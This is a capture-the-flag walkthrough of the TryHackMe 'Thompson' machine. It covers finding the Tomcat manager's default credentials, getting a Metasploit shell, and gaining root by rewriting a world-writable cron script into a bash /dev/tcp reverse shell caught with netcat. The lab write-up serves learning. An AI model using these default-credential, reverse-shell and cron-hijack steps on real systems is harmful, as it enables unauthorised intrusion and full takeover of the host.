THM-Thompson-Writeup
boot2root machine for FIT and bsides guatemala CTF
Find This Room: Thompson
If you want to get the Answer directly
Recon
There’re 3 ports opened: 22(ssh), 8080(http) and 8009(ajp). Let’s access its website via port 8080.
It’s a default Apache website. I’ve checked the page source but nothing valuable. Now I’ll scan for hidden dirs using ffuf
There are two suspicious folders: /host-manager and /manager.
First, let’s access /manager.
Upon entry, a prompt appears requesting a username and password. Since I haven’t figured them out yet,
I click “Cancel.” Surprisingly, this leads me to default credentials!
Well let’s try again with tomcat:s3cret
Now We have registered as a manager
try this credential for /host-manager and still successful.
Intial Access
We will use Metaspott for a reverse shell upload
Then search for tomcat exploit:
search tomcat
use 18
In order to exploit, you need to specify the username and password of tomcat, which is tomcat:s3cret, RHOSTS, which is the machine ip, and RPORT to 8080. And also, change LHOST to your VPN ip.
Remember to set this numbers to run exploitation ( set FingerprintCheck false )
After everything is set, run
Post-Exploiation
Get User Flag
Now I’ve had the meterpreter shell. Move around and get the first flag in /home/jack
Now let’s get root to get our final flag. Input “shell” to spawn a shell. Then use python to spawn a tty shell.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
There is a script called “id.sh”. What it does is that print id command’s result to test.txt. Read the content of test.txt:
Get Root Flag
Now i know that there will be a cronjob. This cronjob will run id.sh as root. So let’s check if I can modify the content of this script.
Yes I can, because its permission is 777! So let’s modify the content of this shell to spawn a shell, and wait for the cronjob to run.
cat > id.sh <<EOF
#!/bin/bash
bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1
EOF
Check the content of id.sh again:
Now start a listener on your machine:
nc -lvnp <port>
Wait for about 1 min, I’m root!
Boom Now we Roooot
Get Final Flag
If you want to try the 2nd way, which is generating a .war shell and access via browser, read the content here:
Happy Hacking
